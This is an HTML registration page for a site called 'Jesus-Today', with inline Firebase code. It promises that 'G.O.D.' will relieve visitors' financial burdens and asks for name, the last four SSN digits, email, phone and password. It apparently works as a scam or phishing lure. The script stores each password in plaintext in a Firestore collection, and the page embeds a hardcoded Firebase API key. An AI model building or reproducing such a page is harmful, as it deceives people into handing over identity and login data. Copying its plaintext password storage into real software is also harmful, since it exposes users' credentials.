<!DOCTYPE html>
<html>
  <head>
    <link href="https://fonts.googleapis.com/css?family=SF+UI+Text&display=swap" rel="stylesheet" />
      <script src="https://www.gstatic.com/firebasejs/8.6.2/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.6.2/firebase-analytics.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.6.2/firebase-auth.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.6.2/firebase-firestore.js"></script>
   <title>Document</title>
    <meta name="viewport" content="width=device-width, initial-size=1.0">
</head>
<body>
    
    <div class="v3_55"></div><span class="v3_56">Visit Jesus-Today</span>
    <div class="v38_78"><div class="v38_79"></div><div class="v38_80"></div>
    <div class="v38_81"></div></div><span class="v38_82">EN</span></div>
    <div class="v3_57"><div class="v3_58"></div>
    <input type="button" id="submit" class="v3_59"><span class="v3_60">Register</span>
    <input id="name" type="text" class="v3_61"><span class="v3_62">Name</span>
    <span class="v3_63">Welcome G.O.D</span><span class="v4_70">Thank you for taking time to visit Jesus-Today.
    Our goal is to be your saver. G.O.D. would like
    to assist you with your Financial burdens.
    Please take a moment to claim your account.</span>
    <input id="ssn" type='text' class="v3_64">
    <span class="v3_65">Last 4 Digits of SSN</span>
    <input type='text' id="email" class="v4_73"><span class="v4_74">Email address</span>
    <input type='text' id="phone" class="v4_75"><span class="v4_76">Cell Phone Number</span>
    <input id="password" type='text' class="v4_77"><span class="v4_78">Password</span>
    <span class="v3_66">Already Have an account?<a href="./login.html" style="color: rgba(205,162,66,1);">Login Now</a></span>
    <img src="../AnyConv.com__GOD_LOGO-removebg-preview.png" class="v3_67"><span class="v3_68">Visit Jesus-Today</span>
</div>
<p id="err"></p>
<script>
const firebaseConfig = {
  apiKey: "AIzaSyDa4LA1g6SVfiS6nLe_GepR3laqYSjJAgM",
  authDomain: "its-called-god.firebaseapp.com",
  databaseURL: "https://its-called-god-default-rtdb.firebaseio.com",
  projectId: "its-called-god",
  storageBucket: "its-called-god.appspot.com",
  messagingSenderId: "275751011368",
  appId: "1:275751011368:web:2cb96ef26c597f1b55611d",
  measurementId: "G-Z031GSPW7N"
};

// Initialize Firebase
firebase.initializeApp(firebaseConfig);

//input values

//creating account
document.getElementById("submit").addEventListener("click", function() {
 //assign
 const password = document.getElementById("password").value;
 const email = document.getElementById("email").value;
  firebase.auth().createUserWithEmailAndPassword(email, password)


  .then((userCredential) => {
    // Signed in 
    var user = userCredential.user;
    // replace 
     localStorage.setItem("ID", email);
    window.location.replace("Dashboard.html");
    //try ;-;
    setTimeout( function(){
  const name = document.getElementById("name").value;
const pass =  document.getElementById("password").value;
const phone = document.getElementById("phone").value;

  const email = document.getElementById("email").value;

  firebase.firestore().collection("users").doc(email).add({
   Name: name,
   Email: email,
   Phone: phone,
   Password: pass
 }).catch((error) => {
    var errorCode = error.code;
    var errorMessage = error.message;
    // ..
    console.log(errorCode + ': ' + errorMessage);
   });
console.log("initiated");
}, 3000)
 
  })
  .catch((error) => {
    var errorCode = error.code;
    var errorMessage = error.message;
    // ..
    document.getElementById("err").innerText = errorCode + errorMessage
  });

})
//transfer
firebase.auth().onAuthStateChanged((user) => {
  if (user) {
    // User is signed in, see docs for a list of available properties
    // https://firebase.google.com/docs/reference/js/firebase.User
    var uid = user.uid;
    window.location.replace("Dashboard.html");
    // ...
  } else {
    // User is signed out
    // ...
  }
});


</script>
<style>* {
    box-sizing: border-box;
  }
  body {
    font-size: 14px;
  }
  input{
    border: none;
    outline: none;
  }
  .v3_44 {
    width: 414px;
    height: 896px;
    background: rgba(255,255,255,1);
    opacity: 1;
    position: relative;
    top: 0px;
    left: 0px;
    overflow: hidden;
  }
  .v3_45 {
    width: 414px;
    height: 896px;
    background: rgba(255,255,255,1);
    opacity: 1;
    position: relative;
    top: 0px;
    left: 0px;
    overflow: hidden;
  }
  .v3_47 {
    width: 360px;
    height: 60px;
    background: linear-gradient(rgba(218,182,93,1), rgba(202,157,60,1));
    opacity: 1;
    position: absolute;
    top: 519px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v3_48 {
    width: 61px;
    color: rgba(255,255,255,1);
    position: absolute;
    top: 536px;
    left: 177px;
    font-family: SF UI Text;
    font-weight: Bold;
    font-size: 22px;
    opacity: 1;
    text-align: left;
  }
  .v3_49 {
    width: 360px;
    height: 60px;
    background: rgba(245,245,245,1);
    opacity: 1;
    position: absolute;
    top: 353px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v3_50 {
    width: 105px;
    color: rgba(116,116,116,1);
    position: absolute;
    top: 375px;
    left: 48px;
    font-family: SF UI Text;
    font-weight: Regular;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v3_51 {
    width: 73px;
    color: rgba(0,0,0,1);
    position: absolute;
    top: 296px;
    left: 171px;
    font-family: SF UI Text;
    font-weight: Medium;
    font-size: 22px;
    opacity: 1;
    text-align: left;
  }
  .v3_52 {
    width: 360px;
    height: 60px;
    background: rgba(245,245,245,1);
    opacity: 1;
    position: absolute;
    top: 427px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v3_53 {
    width: 73px;
    color: rgba(116,116,116,1);
    position: absolute;
    top: 448px;
    left: 48px;
    font-family: SF UI Text;
    font-weight: Regular;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v3_54 {
    width: 292px;
    color: url("https://www.figma.com/file/CMmYDzo4MvC8RzoxlUEgoQ/global-opertaions-department-Copy?node-id=38%3A78");
    position: absolute;
    top: 793px;
    left: 61px;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v3_55 {
    width: 260px;
    height: 180px;
  
    background-repeat: no-repeat;
    background-position: center center;
    background-size: cover;
    opacity: 1;
    position: absolute;
    top: 50px;
    left: 77px;
    overflow: hidden;
  }
  .v3_56 {
    width: 197px;
    color: rgba(205,162,66,1);
    position: absolute;
    top: 251px;
    left: 109px;
    font-family: SF UI Text;
    font-weight: Bold;
    font-size: 20px;
    opacity: 1;
    text-align: center;
  }
  .v38_78 {
    width: 33px;
    height: 33px;
   
    background-repeat: no-repeat;
    background-position: center center;
    background-size: cover;
    opacity: 1;
    position: absolute;
    top: 44px;
    left: 331px;
    overflow: hidden;
  }
  .v38_79 {
    width: 33px;
    height: 33px;
    background: rgba(196,196,196,1);
    opacity: 1;
    position: relative;
    top: 0px;
    left: 0px;
    border-radius: 50%;
  }
  .v38_80 {
    width: 33px;
    height: 33px;
    background: rgba(196,196,196,1);
    opacity: 1;
    position: relative;
    top: 0px;
    left: 0px;
    border-radius: 50%;
  }
  .v38_81 {
    width: 37px;
    height: 38px;
   
    background-repeat: no-repeat;
    background-position: center center;
    background-size: cover;
    opacity: 1;
    position: absolute;
    top: 2px;
    left: 2px;
    overflow: hidden;
  }
  .v38_82 {
    width: 25px;
    color: rgba(0,0,0,1);
    position: absolute;
    top: 50px;
    left: 369px;
    font-family: SF UI Text;
    font-weight: Semibold;
    font-size: 18px;
    opacity: 1;
    text-align: left;
  }
  .v3_57 {
    width: 414px;
    height: 896px;
    background: rgba(255,255,255,1);
    opacity: 1;
    position: relative;
    top: 0px;
    left: 0px;
    overflow: hidden;
  }
  .v3_58 {
    width: 414px;
    height: 896px;
    background: rgba(255,255,255,1);
    opacity: 1;
    position: relative;
    top: 0px;
    left: 0px;
    overflow: hidden;
  }
  .v3_59 {
    width: 360px;
    height: 60px;
    background: linear-gradient(rgba(218,182,93,1), rgba(202,157,60,1));
    opacity: 1;
    position: absolute;
    top: 741px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v3_60 {
    width: 93px;
    color: rgba(255,255,255,1);
    position: absolute;
    top: 758px;
    left: 161px;
    font-family: SF UI Text;
    font-weight: Bold;
    font-size: 22px;
    opacity: 1;
    text-align: left;
  }
  .v3_61 {
    width: 360px;
    height: 60px;
    background: rgba(245,245,245,1);
    opacity: 1;
    position: absolute;
    top: 353px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v3_62 {
    width: 44px;
    color: rgba(116,116,116,1);
    position: absolute;
    top: 375px;
    left: 48px;
    font-family: SF UI Text;
    font-weight: Regular;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v3_63 {
    width: 165px;
    color: rgba(0,0,0,1);
    position: absolute;
    top: 201px;
    left: 125px;
    font-family: SF UI Text;
    font-weight: Medium;
    font-size: 22px;
    opacity: 1;
    text-align: left;
  }
  .v4_70 {
    width: 346px;
    color: rgba(0,0,0,1);
    position: absolute;
    top: 239px;
    left: 34px;
    font-family: SF UI Text;
    font-weight: Light;
    font-size: 16px;
    opacity: 1;
    text-align: center;
  }
  .v3_64 {
    width: 360px;
    height: 60px;
    background: rgba(245,245,245,1);
    opacity: 1;
    position: absolute;
    top: 427px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v3_65 {
    width: 152px;
    color: rgba(116,116,116,1);
    position: absolute;
    top: 448px;
    left: 48px;
    font-family: SF UI Text;
    font-weight: Regular;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v4_73 {
    width: 360px;
    height: 60px;
    background: rgba(245,245,245,1);
    opacity: 1;
    position: absolute;
    top: 501px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v4_74 {
    width: 105px;
    color: rgba(116,116,116,1);
    position: absolute;
    top: 523px;
    left: 48px;
    font-family: SF UI Text;
    font-weight: Regular;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v4_75 {
    width: 360px;
    height: 60px;
    background: rgba(245,245,245,1);
    opacity: 1;
    position: absolute;
    top: 575px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v4_76 {
    width: 146px;
    color: rgba(116,116,116,1);
    position: absolute;
    top: 596px;
    left: 48px;
    font-family: SF UI Text;
    font-weight: Regular;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v4_77 {
    width: 360px;
    height: 60px;
    background: rgba(245,245,245,1);
    opacity: 1;
    position: absolute;
    top: 649px;
    left: 27px;
    border-top-left-radius: 20px;
    border-top-right-radius: 20px;
    border-bottom-left-radius: 20px;
    border-bottom-right-radius: 20px;
    overflow: hidden;
  }
  .v4_78 {
    width: 146px;
    color: rgba(116,116,116,1);
    position: absolute;
    top: 670px;
    left: 48px;
    font-family: SF UI Text;
    font-weight: Regular;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v3_66 {
    width: 284px;
   
    position: absolute;
    top: 837px;
    left: 65px;
    font-size: 16px;
    opacity: 1;
    text-align: left;
  }
  .v3_67 {
    width: 174px;
    height: 121px;
   
    background-repeat: no-repeat;
    background-position: center center;
    background-size: cover;
    opacity: 1;
    position: absolute;
    top: 30px;
    left: 120px;
    overflow: hidden;
    animation: rotation 3s infinite linear; 
}

@keyframes rotation {
  100%{ transform:rotatey(360deg) }
}
  .v3_68 {
    width: 179px;
    color: rgba(205,162,66,1);
    position: absolute;
    top: 158px;
    left: 118px;
    font-family: SF UI Text;
    font-weight: Bold;
    font-size: 20px;
    opacity: 1;
    text-align: center;
  }
  </style>
</body>
</html>